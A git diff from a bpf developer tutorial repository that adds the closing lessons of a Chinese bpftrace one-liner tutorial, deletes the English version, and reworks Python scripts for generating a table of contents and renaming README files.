+ +@[ +__schedule+697 +__schedule+697 +schedule+50 +schedule_timeout+365 +xfsaild+274 +kthread+248 +ret_from_fork+53 +]: 73 +@[ +__schedule+697 +__schedule+697 +schedule_idle+40 +do_idle+356 +cpu_startup_entry+111 +start_secondary+423 +secondary_startup_64+165 +]: 305 +``` + +这里统计进程上下文切换次数。以上输出被截断,只输出了最后两个结果。 + +- sched: 跟踪调度类别的调度器事件:sched_switch, sched_wakeup, sched_migrate_task等。 +- sched_switch: 当线程释放cpu资源,当前不运行时触发。这里可能的阻塞事件:如等待I/O,定时器,分页/交换,锁等。 +- kstack: 内核堆栈跟踪,打印调用栈。 +- sched_switch在线程切换的时候触发,打印的调用栈是被切换出cpu的那个线程。像你使用其他探针一样,注意这里的上下文,例如comm, pid, kstack等等,并不一定反映了探针的目标的状态。 + +# 11. 块级I/O跟踪 + +``` +# bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' +Attaching 1 probe... +^C + +@: +[0, 1] 1 |@@ | +[2, 4) 0 | | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 0 | | +[64, 128) 0 | | +[128, 256) 0 | | +[256, 512) 0 | | +[512, 1K) 0 | | +[1K, 2K) 0 | | +[2K, 4K) 0 | | +[4K, 8K) 24 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[8K, 16K) 2 |@@@@ | +[16K, 32K) 6 |@@@@@@@@@@@@@ | +[32K, 64K) 5 |@@@@@@@@@@ | +[64K, 128K) 0 | | +[128K, 256K) 1 |@@ | + +``` + +以上是块I/O请求字节数的直方图。 + +- tracepoint:block: 块类别的跟踪点跟踪块级I/O事件。 +- block_rq_issue: 当I/O提交到块设备时触发。 +- args.bytes: 跟踪点block_rq_issue的参数成员bytes,表示提交I/O请求的字节数。 + +该探针的上下文是非常重要的: 它在I/O请求被提交给块设备时触发。这通常发生在进程上下文,此时通过内核的comm可以得到进程名;也可能发生在内核上下文,(如readahead),此时不能显示预期的进程号和进程名信息。 + +# 12. 内核结构跟踪 + +``` +# cat path.bt +#ifndef BPFTRACE_HAVE_BTF +#include +#include +#endif + +kprobe:vfs_open +{ + printf("open path: %s\n", str(((struct path *)arg0)->dentry->d_name.name)); +} + +# bpftrace path.bt +Attaching 1 probe... +open path: dev +open path: if_inet6 +open path: retrans_time_ms +[...] +``` + + +这里使用内核动态跟踪技术跟踪vfs_read()函数,该函数的(struct path *)作为第一个参数。 + +- kprobe: 如前面所述,这是内核动态跟踪kprobe探针类型,跟踪内核函数的调用(kretprobe探针类型跟踪内核函数返回值)。 +- `arg0` 是一个内建变量,表示探针的第一个参数,其含义由探针类型决定。对于`kprobe`类型探针,它表示函数的第一个参数。其它参数使用arg1,...,argN访问。 +- `((struct path *)arg0)->dentry->d_name.name`: 这里`arg0`作为`struct path *`并引用dentry。 +- #include: 在没有BTF (BPF Type Format) 的情况下,包含必要的path和dentry类型声明的头文件。 + +bpftrace对内核结构跟踪的支持和bcc是一样的,允许使用内核头文件。这意味着大多数结构是可用的,但是并不是所有的,有时需要手动增加某些结构的声明。例如这个例子,见[dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt),包含struct nameidata的声明。倘若内核有提供BTF数据,则所有结构都可用。 + +现在,你已经理解了bpftrace的大部分功能,你可以开始使用和编写强大的一行命令。查阅[参考手册](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md)更多的功能。 + +> 原文地址:https://github.com/iovisor/bpftrace/blob/master/docs diff --git a/src/bpftrace-tutorial/README_en.md b/src/bpftrace-tutorial/README_en.md deleted file mode 100644 index bb5788b..0000000 --- a/src/bpftrace-tutorial/README_en.md +++ /dev/null @@ -1,328 +0,0 @@ -# The bpftrace One-Liner Tutorial - -This teaches you bpftrace for Linux in 12 easy lessons, where each lesson is a one-liner you can try running. This series of one-liners introduces concepts which are summarized as bullet points. For a full reference to bpftrace, see the [Man page](https://github.com/iovisor/bpftrace/blob/master/docs/../man/adoc/bpftrace.adoc) - -Contributed by Brendan Gregg, Netflix (2018), based on his FreeBSD [DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial). - -# Lesson 1. Listing Probes - -``` -bpftrace -l 'tracepoint:syscalls:sys_enter_*' -``` - -"bpftrace -l" lists all probes, and a search term can be added. - -- A probe is an instrumentation point for capturing event data. 
-- The supplied search term supports wildcards/globs (`*` and `?`) -- "bpftrace -l" can also be piped to grep(1) for full regular expression searching. - -# Lesson 2. Hello World - -``` -# bpftrace -e 'BEGIN { printf("hello world\n"); }' -Attaching 1 probe... -hello world -^C -``` - -This prints a welcome message. Run it, then hit Ctrl-C to end. - -- The word `BEGIN` is a special probe that fires at the start of the program (like awk's BEGIN). You can use it to set variables and print headers. -- An action can be associated with probes, in { }. This example calls printf() when the probe fires. - -# Lesson 3. File Opens - -``` -# bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }' -Attaching 1 probe... -snmp-pass /proc/cpuinfo -snmp-pass /proc/stat -snmpd /proc/net/dev -snmpd /proc/net/if_inet6 -^C -``` - -This traces file opens as they happen, and we're printing the process name and pathname. - -- It begins with the probe `tracepoint:syscalls:sys_enter_openat`: this is the tracepoint probe type (kernel static tracing), and is instrumenting when the `openat()` syscall begins (is entered). Tracepoints are preferred over kprobes (kernel dynamic tracing, introduced in lesson 6), since tracepoints have stable API. Note: In modern Linux systems (glibc >= 2.26) the `open` wrapper always calls the `openat` syscall. -- `comm` is a builtin variable that has the current process's name. Other similar builtins include pid and tid. -- `args` is a struct containing all the tracepoint arguments. This -struct is automatically generated by bpftrace based tracepoint information. The -members of this struct can be found with: `bpftrace -vl tracepoint:syscalls:sys_enter_openat`. -- `args.filename` accesses the `args` struct and gets the value of the - `filename` member. -- `str()` turns a pointer into the string it points to. - -# Lesson 4. Syscall Counts By Process - -``` -bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' -Attaching 1 probe... -^C - -@[bpftrace]: 6 -@[systemd]: 24 -@[snmp-pass]: 96 -@[sshd]: 125 -``` - -This summarizes syscalls by process name, printing a report on Ctrl-C. - -- @: This denotes a special variable type called a map, which can store and summarize data in different ways. You can add an optional variable name after the @, eg "@num", either to improve readability, or to differentiate between more than one map. -- []: The optional brackets allow a key to be set for the map, much like an associative array. -- count(): This is a map function – the way it is populated. count() counts the number of times it is called. Since this is saved by comm, the result is a frequency count of system calls by process name. - -Maps are automatically printed when bpftrace ends (eg, via Ctrl-C). - -# Lesson 5. Distribution of read() Bytes - -``` -# bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }' -Attaching 1 probe... -^C - -@bytes: -[0, 1] 12 |@@@@@@@@@@@@@@@@@@@@ | -[2, 4) 18 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 30 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[64, 128) 19 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[128, 256) 1 |@ -``` - -This summarizes the return value of the sys_read() kernel function for PID 18644, printing it as a histogram. - -- /.../: This is a filter (aka predicate), which acts as a filter for the action. 
The action is only executed if the filtered expression is true, in this case, only for the process ID 18644. Boolean operators are supported ("&&", "||"). -- ret: This is the return value of the function. For sys_read(), this is either -1 (error) or the number of bytes successfully read. -- @: This is a map similar to the previous lesson, but without any keys ([]) this time, and the name "bytes" which decorates the output. -- hist(): This is a map function which summarizes the argument as a power-of-2 histogram. The output shows rows that begin with interval notation, where, for example `[128, 256)` means that the value is: 128 <= value < 256. The next number is the count of occurrences, and then an ASCII histogram is printed to visualize that count. The histogram can be used to study multi-modal distributions. -- Other map functions include lhist() (linear hist), count(), sum(), avg(), min(), and max(). - -# Lesson 6. Kernel Dynamic Tracing of read() Bytes - -``` -# bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }' -Attaching 1 probe... -^C - -@bytes: -(...,0] 0 | | -[0, 200) 66 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[200, 400) 2 |@ | -[400, 600) 3 |@@ | -[600, 800) 0 | | -[800, 1000) 5 |@@@ | -[1000, 1200) 0 | | -[1200, 1400) 0 | | -[1400, 1600) 0 | | -[1600, 1800) 0 | | -[1800, 2000) 0 | | -[2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -``` - -Summarize read() bytes as a linear histogram, and traced using kernel dynamic tracing. - -- It begins with the probe `kretprobe:vfs_read`: this is the kretprobe probe type (kernel dynamic tracing of function returns) instrumenting the `vfs_read()` kernel function. There is also the kprobe probe type (shown in the next lesson), to instrument when functions begin execution (are entered). These are powerful probe types, letting you trace tens of thousands of different kernel functions. However, these are "unstable" probe types: since they can trace any kernel function, there is no guarantee that your kprobe/kretprobe will work between kernel versions, as the function names, arguments, return values, and roles may change. Also, since it is tracing the raw kernel, you'll need to browse the kernel source to understand what these probes, arguments, and return values, mean. -- lhist(): this is a linear histogram, where the arguments are: value, min, max, step. The first argument (`retval`) of vfs_read() is the return value: the number of bytes read. - -# Lesson 7. Timing read()s - -``` -# bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }' -Attaching 2 probes... - -[...] -@ns[snmp-pass]: -[0, 1] 0 | | -[2, 4) 0 | | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 0 | | -[64, 128) 0 | | -[128, 256) 0 | | -[256, 512) 27 |@@@@@@@@@ | -[512, 1k) 125 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[1k, 2k) 22 |@@@@@@@ | -[2k, 4k) 1 | | -[4k, 8k) 10 |@@@ | -[8k, 16k) 1 | | -[16k, 32k) 3 |@ | -[32k, 64k) 144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[64k, 128k) 7 |@@ | -[128k, 256k) 28 |@@@@@@@@@@ | -[256k, 512k) 2 | | -[512k, 1M) 3 |@ | -[1M, 2M) 1 | | -``` - -Summarize the time spent in read(), in nanoseconds, as a histogram, by process name. - -- @start[tid]: This uses the thread ID as a key. There may be many reads in-flight, and we want to store a start timestamp to each. How? We could construct a unique identifier for each read, and use that as the key. 
But because kernel threads can only be executing one syscall at a time, we can use the thread ID as the unique identifier, as each thread cannot be executing more than one. -- nsecs: Nanoseconds since boot. This is a high resolution timestamp counter than can be used to time events. -- /@start[tid]/: This filter checks that the start time was seen and recorded. Without this filter, this program may be launched during a read and only catch the end, resulting in a time calculation of now - zero, instead of now - start. - -- delete(@start[tid]): this frees the variable. - -# Lesson 8. Count Process-Level Events - -``` -# bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }' -Attaching 25 probes... -@[tracepoint:sched:sched_wakeup_new]: 1 -@[tracepoint:sched:sched_process_fork]: 1 -@[tracepoint:sched:sched_process_exec]: 1 -@[tracepoint:sched:sched_process_exit]: 1 -@[tracepoint:sched:sched_process_free]: 2 -@[tracepoint:sched:sched_process_wait]: 7 -@[tracepoint:sched:sched_wake_idle_without_ipi]: 53 -@[tracepoint:sched:sched_stat_runtime]: 212 -@[tracepoint:sched:sched_wakeup]: 253 -@[tracepoint:sched:sched_waking]: 253 -@[tracepoint:sched:sched_switch]: 510 -``` - -Count process-level events for five seconds, printing a summary. - -- sched: The `sched` probe category has high-level scheduler and process events, such as fork, exec, and context switch. -- probe: The full name of the probe. -- interval:s:5: This is a probe that fires once every 5 seconds, on one CPU only. It is used for creating script-level intervals or timeouts. -- exit(): This exits bpftrace. - -# Lesson 9. Profile On-CPU Kernel Stacks - -``` -# bpftrace -e 'profile:hz:99 { @[kstack] = count(); }' -Attaching 1 probe... -^C - -[...] -@[ -filemap_map_pages+181 -__handle_mm_fault+2905 -handle_mm_fault+250 -__do_page_fault+599 -async_page_fault+69 -]: 12 -[...] -@[ -cpuidle_enter_state+164 -do_idle+390 -cpu_startup_entry+111 -start_secondary+423 -secondary_startup_64+165 -]: 22122 -``` - -Profile kernel stacks at 99 Hertz, printing a frequency count. - -- profile:hz:99: This fires on all CPUs at 99 Hertz. Why 99 and not 100 or 1000? We want frequent enough to catch both the big and small picture of execution, but not too frequent as to perturb performance. 100 Hertz is enough. But we don't want 100 exactly, as sampling may occur in lockstep with other timed activities, hence 99. -- kstack: Returns the kernel stack trace. This is used as a key for the map, so that it can be frequency counted. The output of this is ideal to be visualized as a flame graph. There is also `ustack` for the user-level stack trace. - -# Lesson 10. Scheduler Tracing - -``` -# bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }' -^C -[...] - -@[ -__schedule+697 -__schedule+697 -schedule+50 -schedule_timeout+365 -xfsaild+274 -kthread+248 -ret_from_fork+53 -]: 73 -@[ -__schedule+697 -__schedule+697 -schedule_idle+40 -do_idle+356 -cpu_startup_entry+111 -start_secondary+423 -secondary_startup_64+165 -]: 305 -``` - -This counts stack traces that led to context switching (off-CPU) events. The above output has been truncated to show the last two only. - -- sched: The sched category has tracepoints for different kernel CPU scheduler events: sched_switch, sched_wakeup, sched_migrate_task, etc. -- sched_switch: This probe fires when a thread leaves CPU. This will be a blocking event: eg, waiting on I/O, a timer, paging/swapping, or a lock. -- kstack: A kernel stack trace. 
-- sched_switch fires in thread context, so that the stack refers to the thread who is leaving. As you use other probe types, pay attention to context, as comm, pid, kstack, etc, may not refer to the target of the probe. - -# Lesson 11. Block I/O Tracing - -``` -# bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' -Attaching 1 probe... -^C - -@: -[0, 1] 1 |@@ | -[2, 4) 0 | | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 0 | | -[64, 128) 0 | | -[128, 256) 0 | | -[256, 512) 0 | | -[512, 1K) 0 | | -[1K, 2K) 0 | | -[2K, 4K) 0 | | -[4K, 8K) 24 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[8K, 16K) 2 |@@@@ | -[16K, 32K) 6 |@@@@@@@@@@@@@ | -[32K, 64K) 5 |@@@@@@@@@@ | -[64K, 128K) 0 | | -[128K, 256K) 1 |@@ | - -``` - -Block I/O requests by size in bytes, as a histogram. - -- tracepoint:block: The block category of tracepoints traces various block I/O (storage) events. -- block_rq_issue: This fires when an I/O is issued to the device. -- args.bytes: This is a member from the tracepoint block_rq_issue arguments which shows the size in bytes. - -The context of this probe is important: this fires when the I/O is issued to the device. This often happens in process context, where builtins like comm will show you the process name, but it can also happen from kernel context (eg, readahead) when the pid and comm will not show the application you expect. - -# Lesson 12. Kernel Struct Tracing - -``` -# cat path.bt -#ifndef BPFTRACE_HAVE_BTF -#include -#include -#endif - -kprobe:vfs_open -{ - printf("open path: %s\n", str(((struct path *)arg0)->dentry->d_name.name)); -} - -# bpftrace path.bt -Attaching 1 probe... -open path: dev -open path: if_inet6 -open path: retrans_time_ms -[...] -``` - -This uses kernel dynamic tracing of the vfs_open() function, which has a (struct path *) as the first argument. - -- kprobe: As mentioned earlier, this is the kernel dynamic tracing probe type, which traces the entry of kernel functions (use kretprobe to trace their returns). -- `arg0` is a builtin variable containing the first probe argument, the meaning of which is defined by the probe type. For `kprobe`, it is the first argument to the function. Other arguments can be accessed as arg1, ..., argN. -- `((struct path *)arg0)->dentry->d_name.name`: this casts `arg0` as `struct path *`, then dereferences dentry, etc. -- #include: these are necessary to include struct definitions for path and dentry on systems where the kernel was built without BTF (BPF Type Format) data. - -The kernel struct support is the same as bcc, making use of kernel headers. This means that many structs are available, but not everything, and sometimes it might be necessary to manually include a struct. For an example of this, see the [dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt), which includes a portion of struct nameidata manually as it wasn't in the available headers. If the kernel has BTF data, all kernel structs are always available. - -At this point you understand much of bpftrace, and can begin to use and write powerful one-liners. See the [Reference Guide](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md) for more capabilities. 
-
-> The original tutorial link: https://github.com/iovisor/bpftrace/blob/master/docs/
diff --git a/src/scripts/generate_toc.py b/src/scripts/generate_toc.py
index 55c4601..6f0435f 100644
--- a/src/scripts/generate_toc.py
+++ b/src/scripts/generate_toc.py
@@ -34,7 +34,7 @@ def generate_toc(base_dir, project_root):
    for directory in all_dirs:
        lesson_path = os.path.join(base_dir, directory)
        config_path = os.path.join(lesson_path, ".config")
-        readme_path = os.path.join(lesson_path, "README_en.md")
+        readme_path = os.path.join(lesson_path, "README.md")

        if os.path.exists(config_path) and os.path.exists(readme_path):
            # Read the .config file for 'level', 'type', and 'desc'
@@ -139,7 +139,7 @@ def generate_toc_cn(base_dir, project_root):
    for directory in all_dirs:
        lesson_path = os.path.join(base_dir, directory)
        config_path = os.path.join(lesson_path, ".config")
-        readme_path = os.path.join(lesson_path, "README.md")
+        readme_path = os.path.join(lesson_path, "README.zh.md")

        if os.path.exists(config_path) and os.path.exists(readme_path):
            # Read the .config file for 'level', 'type', and 'desc'
@@ -213,7 +213,7 @@
# Example usage
base_directory = "/root/bpf-developer-tutorial/src/"  # Replace with the actual base directory
project_root = "/root/bpf-developer-tutorial/src/"  # The root of the project
-toc_output = generate_toc(base_directory, project_root)
-
+# toc_output = generate_toc(base_directory, project_root)
+toc_output = generate_toc_cn(base_directory, project_root)
# Output the TOC
print(toc_output)
diff --git a/src/scripts/rename.py b/src/scripts/rename.py
index bcaee0c..981df46 100644
--- a/src/scripts/rename.py
+++ b/src/scripts/rename.py
@@ -1,23 +1,34 @@
import os

-def rename_readme_files(base_dir):
-    # Walk through all directories and files starting from base_dir
+def rename_readme_en_to_readme(base_dir):
+    # Second pass: rename README_en.md to README.md (run after the zh pass)
    for root, dirs, files in os.walk(base_dir):
        for file in files:
            file_path = os.path.join(root, file)

-            # Rename README.md to README.zh.md if README.md exists after the previous rename
+            # Rename README_en.md to README.md
+            if file == "README_en.md":
+                new_file_path = os.path.join(root, "README.md")
+                os.rename(file_path, new_file_path)
+                print(f"Renamed {file_path} to {new_file_path}")
+
+def rename_readme_to_readme_zh(base_dir):
+    # First pass: rename README.md to README.zh.md
+    for root, dirs, files in os.walk(base_dir):
+        for file in files:
+            file_path = os.path.join(root, file)
+
+            # Rename README.md to README.zh.md if it exists
            if file == "README.md":
                zh_file_path = os.path.join(root, "README.zh.md")
                os.rename(file_path, zh_file_path)
                print(f"Renamed {file_path} to {zh_file_path}")

-            # Rename README_en.md to README.md
-            elif file == "README_en.md":
-                new_file_path = os.path.join(root, "README.md")
-                os.rename(file_path, new_file_path)
-                print(f"Renamed {file_path} to {new_file_path}")
-
# Example usage
base_directory = "/root/bpf-developer-tutorial/src"  # Replace with the actual base directory
-rename_readme_files(base_directory)
+
+# First pass: rename README.md to README.zh.md
+rename_readme_to_readme_zh(base_directory)
+
+# Second pass: rename README_en.md to README.md
+rename_readme_en_to_readme(base_directory)
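+
+# Ordering note (added for clarity): os.rename() silently replaces an existing
+# destination on POSIX systems. If README_en.md were promoted to README.md
+# first, the original Chinese README.md would be overwritten before it could
+# be preserved as README.zh.md, so the README.zh.md pass must run first.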